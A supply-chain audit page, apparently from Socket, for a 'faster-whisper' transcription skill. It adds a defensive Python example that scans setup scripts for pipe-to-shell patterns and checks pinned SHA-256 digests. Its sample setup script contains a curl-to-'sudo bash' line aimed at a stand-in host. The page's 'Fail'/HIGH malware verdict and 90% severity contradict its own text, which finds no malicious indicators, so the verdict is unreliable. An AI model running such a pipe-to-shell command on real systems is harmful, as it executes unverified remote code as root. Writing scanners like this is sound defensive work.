faster-whisper

Audit result: Fail

Audited by Socket on Feb 28, 2026

1 alert found:

Malware (severity: HIGH) in SKILL.md

This is documentation for a local transcription skill (faster-whisper) that legitimately requires downloading ML model weights and installing PyTorch and ffmpeg. I found no indicators of deliberate credential harvesting, data exfiltration, obfuscated payloads, or embedded malware in the provided text. The primary security concerns are standard supply-chain risks: automatic model and wheel downloads, and setup scripts that perform automated installs (especially on Windows via winget). These behaviors are expected for ML tooling, but they widen the attack surface if the upstream model repositories, the wheel indexes, or the setup scripts themselves are compromised.

Recommendations: (1) inspect the actual setup.sh / setup.ps1 scripts before running them and confirm they do not execute unverified remote code or pipe downloads into a shell; (2) pin checksums for model weights and wheels, or verify signatures where the publisher provides them; (3) run installs in isolated environments (VMs or containers) and do not run the scripts with elevated privileges without reviewing them first.

Overall: low likelihood of intentional malicious behavior in the provided documentation, but moderate supply-chain risk because of the external binary downloads and the auto-install behavior.
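The recommendations above, as an added example rather than code from faster-whisper, the skill, or Socket: a Python pre-install check that flags pipe-to-shell and remote-eval lines in a skill's setup.sh / setup.ps1, and that refuses (and deletes) a downloaded artifact whose SHA-256 does not match a pinned digest. The sample setup script, the example.invalid URL, the pattern list, and the stand-in "weights" are all constructed for this example; a real pinned digest comes from the upstream release or from the value you recorded when you first vetted the file.

```python
"""Pre-install checks for a skill's setup scripts and downloaded artifacts.

Added example; not code from faster-whisper, the skill, or Socket.
All sample inputs below are constructed for illustration.
"""
import hashlib
import hmac
import re
import tempfile
from pathlib import Path

# Lines that fetch remote content and hand it straight to an interpreter.
# Constructed list; extend it for the tooling you actually use.
PIPE_TO_SHELL = [
    re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),      # curl ... | bash
    re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?python[0-9.]*\b"),   # curl ... | python3
    re.compile(r"\b(ba|z|)sh\s+<\(\s*(curl|wget)\b"),                      # bash <(curl ...)
    re.compile(r"\beval\s+\"?\$\(\s*(curl|wget)\b"),                       # eval "$(curl ...)"
    re.compile(r"\b(Invoke-Expression|iex)\b", re.IGNORECASE),             # PowerShell remote eval
]


def find_pipe_to_shell(script_text: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped_line) for every non-comment line that feeds remote code to an interpreter."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(line) for p in PIPE_TO_SHELL):
            hits.append((lineno, stripped))
    return hits


def scan_setup_scripts(skill_dir: Path, names=("setup.sh", "setup.ps1")) -> dict[str, list[tuple[int, str]]]:
    """Scan the setup scripts a skill ships, keyed by file name; files that are not present are skipped."""
    return {n: find_pipe_to_shell((skill_dir / n).read_text(errors="replace"))
            for n in names if (skill_dir / n).is_file()}


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file so multi-GB model weights never have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify_pinned(path: Path, expected_sha256: str) -> bool:
    """True only if the on-disk artifact matches the pinned digest (constant-time comparison)."""
    return hmac.compare_digest(sha256_file(path), expected_sha256.strip().lower())


def require_pinned(path: Path, expected_sha256: str) -> Path:
    """Refuse and delete a mismatching artifact so no later step can load it by accident."""
    if not verify_pinned(path, expected_sha256):
        path.unlink(missing_ok=True)
        raise RuntimeError(f"{path.name}: SHA-256 mismatch against pinned value; artifact removed")
    return path


# Constructed setup script resembling what a skill might ship; line 5 is the problem.
SAMPLE_SETUP_SH = """#!/usr/bin/env bash
set -euo pipefail
# system deps
sudo apt-get install -y ffmpeg
curl -fsSL https://example.invalid/get-torch.sh | sudo bash
pip install faster-whisper
python -c "from faster_whisper import WhisperModel; WhisperModel('large-v3')"
"""

# Stand-in for model weights: the FIPS 180-2 'abc' test vector, so the pinned digest is a known constant.
SAMPLE_WEIGHTS = b"abc"
SAMPLE_WEIGHTS_SHA256 = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"


def demo() -> dict:
    """Run both checks against the constructed inputs and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        skill = Path(tmp)
        (skill / "setup.sh").write_text(SAMPLE_SETUP_SH)
        script_hits = scan_setup_scripts(skill)

        weights = skill / "model.bin"
        weights.write_bytes(SAMPLE_WEIGHTS)
        genuine_ok = verify_pinned(weights, SAMPLE_WEIGHTS_SHA256)

        weights.write_bytes(SAMPLE_WEIGHTS + b"\x00")   # simulate a tampered or truncated download
        try:
            require_pinned(weights, SAMPLE_WEIGHTS_SHA256)
            tampered_rejected = False
        except RuntimeError:
            tampered_rejected = not weights.exists()   # rejected and removed
    return {
        "pipe_to_shell": {name: [n for n, _ in hits] for name, hits in script_hits.items()},
        "genuine_weights_ok": genuine_ok,
        "tampered_weights_rejected": tampered_rejected,
    }


if __name__ == "__main__":
    print(demo())
```

For wheels the same idea is already built into pip: put a `--hash=sha256:...` entry on each requirements line and install with `pip install --require-hashes -r requirements.txt`, which refuses any wheel whose digest is not listed. The pattern scan is a review aid, not a proof of safety: a script that downloads a file and executes it in a separate step will not match these patterns, so still read the script before running it, ideally inside the isolated environment the audit recommends.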

Confidence: 95%
Severity: 90%
Audit Metadata
Analyzed At
Feb 28, 2026, 09:09 PM
Package URL
pkg:socket/skills-sh/openclaw%2Fskills%2Ffaster-whisper%2F@2cdd24fa3ad52a128cde5aef575fd3aba3e3ddfe